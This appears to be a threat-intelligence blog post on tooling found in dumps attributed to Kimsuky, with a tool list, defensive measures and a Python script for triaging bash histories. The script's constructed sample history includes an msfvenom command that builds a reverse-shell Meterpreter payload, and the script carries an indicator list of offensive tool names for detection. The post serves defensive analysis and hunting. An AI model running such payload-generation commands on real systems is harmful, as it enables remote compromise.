State-Linked Hacker Toolset Analysis & Defense Blueprint
Background: Recently, unknown individuals uploaded several dumps taken from servers that they claim belong to Kimsuky, a state-sponsored threat actor. As defenders, we should analyze these dumps to understand the actor's tooling and exploits, and then use that analysis to put the appropriate defensive layers in place.
Toolset used by the threat actor: This part is particularly interesting. With full dumps of the systems in hand, the first thing to examine is the users' bash history, which records the commands the operators ran. From that review I identified the tools the actor has used or is still using.
- BetterOCR: OCR helper for extracting text from PDFs and images in multiple languages
- IntelliJ IDEA 2018.3: IDE used for ongoing development work
- minibeacon: minimal HTTP(S) beacon for Cobalt Strike
- TitanLdr: Cobalt Strike loader written in C and assembly; redirects the DNS Beacon over DNS-over-HTTPS (DoH)
- proxyres: C library for proxy resolution
- Custom-PE-Packer: PE packer used to evade AV detection
- BlackLotus: a well-known UEFI bootkit
- RATandC2: combined RAT and C2 framework
- Cobalt Strike components
- Muraena: reverse-proxy phishing tool, also used for post-phishing session handling
- Mettle (the Metasploit native payload) and an older WinRAR exploit

To protect the environment against this kind of threat, the following measures should be put in place:
- Deploy EDR/XDR on all servers and endpoints
- Enable Secure Boot and keep firmware up to date on all machines; since BlackLotus is known to bypass Secure Boot on systems missing the relevant OS patches and boot-manager revocations, apply those as well
- Deploy IDS/IPS at the network layer
- Phishing and web protection, plus employee awareness training
- Threat hunting, including searching shell histories and file systems for the tool names and repositories listed above
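The bash-history triage described in the toolset section, and the threat-hunting item above, can both be driven by a small script. The one below is an added example, not code from the original analysis or from any of the projects named on this page. It reconstructs a timeline from HISTTIMEFORMAT stamps, lists cloned repositories and executed programs, and flags commands that mention the tool names identified above. The sample history lines and the indicator list are constructed for the demo and are assumptions, not real actor data.

```python
"""Triage of dumped .bash_history files for known tooling (added example)."""
import re
import shlex
from collections import Counter
from datetime import datetime, timezone

# Indicator strings taken from the tool list on this page (matched case-insensitively).
TOOL_INDICATORS = (
    "betterocr", "minibeacon", "titanldr", "proxyres", "custom-pe-packer",
    "blacklotus", "ratandc2", "muraena", "mettle",
)

# Constructed sample of a dumped ~/.bash_history written with HISTTIMEFORMAT set,
# so each command is preceded by a '#<epoch>' stamp. Not real actor data.
SAMPLE_HISTORY = """\
#1690000000
git clone https://github.com/example/TitanLdr.git
#1690000120
cd TitanLdr && make
#1690000300
git clone --depth 1 https://github.com/example/Muraena
#1690000400
./muraena -config config.toml
#1690000500
ls -la
#1690000600
python3 -m pip install BetterOCR
#1690000700
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 -f elf -o mettle.elf
"""

_TIMESTAMP = re.compile(r"^#(\d{9,11})$")
# Indicators must be delimited by non-alphanumerics, so 'mettle' hits 'mettle.elf'
# and './muraena' hits, but a substring buried inside a longer word does not.
_INDICATOR = re.compile(
    r"(?<![a-z0-9])(" + "|".join(re.escape(t) for t in TOOL_INDICATORS) + r")(?![a-z0-9])"
)


def parse_history(text):
    """Yield (timestamp or None, command) pairs.

    bash stores HISTTIMEFORMAT stamps as a '#<epoch>' line immediately before
    the command; a history written without it simply yields None timestamps.
    """
    ts = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _TIMESTAMP.match(line)
        if m:
            ts = datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)
            continue
        yield ts, line
        ts = None


def _segments(command):
    """Split a command line on pipes and list operators."""
    return [s.strip() for s in re.split(r"\|\||&&|;|\|", command) if s.strip()]


def _tokens(segment):
    try:
        return shlex.split(segment)
    except ValueError:  # unbalanced quotes, e.g. a truncated last line
        return segment.split()


def executed_programs(command):
    """Program names invoked by a command line; leading VAR=value assignments are skipped."""
    programs = []
    for seg in _segments(command):
        toks = [t for t in _tokens(seg) if not re.match(r"^[A-Za-z_]\w*=", t)]
        if toks:
            programs.append(toks[0].rsplit("/", 1)[-1])
    return programs


def repo_name(url):
    """'https://host/org/TitanLdr.git' or 'git@host:org/TitanLdr.git' -> 'TitanLdr'."""
    tail = url.rstrip("/").rsplit("/", 1)[-1].rsplit(":", 1)[-1]
    return tail[:-4] if tail.endswith(".git") else tail


def cloned_repos(command):
    """Repository names cloned by 'git clone' anywhere in the command line."""
    repos = []
    for seg in _segments(command):
        toks = _tokens(seg)
        if toks[:2] == ["git", "clone"]:
            for t in toks[2:]:  # first non-option argument that looks like a URL or path
                if not t.startswith("-") and ("/" in t or ":" in t):
                    repos.append(repo_name(t))
                    break
    return repos


def triage(text):
    """Return a timeline, cloned repos, a program histogram and indicator hits."""
    timeline, repos, programs, hits = [], [], Counter(), []
    for ts, cmd in parse_history(text):
        timeline.append((ts, cmd))
        repos.extend(cloned_repos(cmd))
        programs.update(executed_programs(cmd))
        m = _INDICATOR.search(cmd.lower())
        if m:
            hits.append((ts, cmd, m.group(1)))
    return {"timeline": timeline, "repos": repos, "programs": programs, "hits": hits}


if __name__ == "__main__":
    report = triage(SAMPLE_HISTORY)
    print("cloned repositories:", report["repos"])
    print("most used programs:", report["programs"].most_common(5))
    for ts, cmd, indicator in report["hits"]:
        stamp = ts.isoformat() if ts else "unknown-time"
        print(f"{stamp}  [{indicator}]  {cmd}")
```

For hunting across a fleet, feed each collected history file to `triage()` and keep the `hits` and `repos` lists; the indicator tuple is the only thing that needs to change when new tooling is identified. Note that a history file without HISTTIMEFORMAT stamps gives no timestamps at all, so ordering is the only timeline information available in that case.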
